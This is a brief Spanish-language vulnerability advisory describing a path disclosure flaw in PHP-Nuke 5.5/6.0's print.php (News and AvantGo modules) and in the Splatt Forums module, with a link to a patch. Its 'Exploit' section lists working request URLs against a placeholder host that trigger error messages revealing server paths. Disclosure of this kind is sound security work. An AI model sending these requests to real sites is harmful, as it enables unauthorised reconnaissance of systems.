Rynho Zeros Web

Publicidad

+ Producto -> PHP-Nuke
+ Version -> 5.5, 6.0 (Otras versiones no han sido testedas)
+ Website -> http://www.phpnuke.org
+ Problema -> Path Disclosure
+ Descubierto por -> XyborG

La falla ocurre en el archivo print.php, el cual esta incluido en los modulos ‘News’ y ‘AvantGo’, en el mismo se chequea que la variable $sid exista, pero no se controla su contenido, ya que si es igual a NULL o no se corresponde con un articulo en la base de datos, genera un error.


+ Exploit:

http://www.target.x/modules.php?name=AvantGo&file=print&sid=
http://www.target.x/modules.php?name=News&file=print&sid=
http://www.target.x/modules.php?name=AvantGo&file=print&sid=[Any_Text]

http://www.target.x/modules.php?name=News&file=print&sid=[Any_Text]

[..]
Otro error de este tipo tambien existe en el modulo “Forums” (Splatt Forums 3.2):

http://www.target.x/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show

[..]

+ Path AvantGo & News solamente:

http://www.rzweb.com.ar/files/site/own/fixes/PHPNuke6.0_5.5_etc.zip

Publicidad

Otros articulos que te pueden interesar

• Multiples vulnerabilidades en SPChat 2.0 para PHP-Nuke & SPChat 0.8.0
• Falla en TOPo V. 1.43 y menores. (in.php, out.php)
• Nuevos servicios en Rynho Zeros Web
• Path Disclosure, XSS y SQL Injection en modulo Downloads de PHP-Nuke
• PHP-Nuke v 6.7 + Windows = File Upload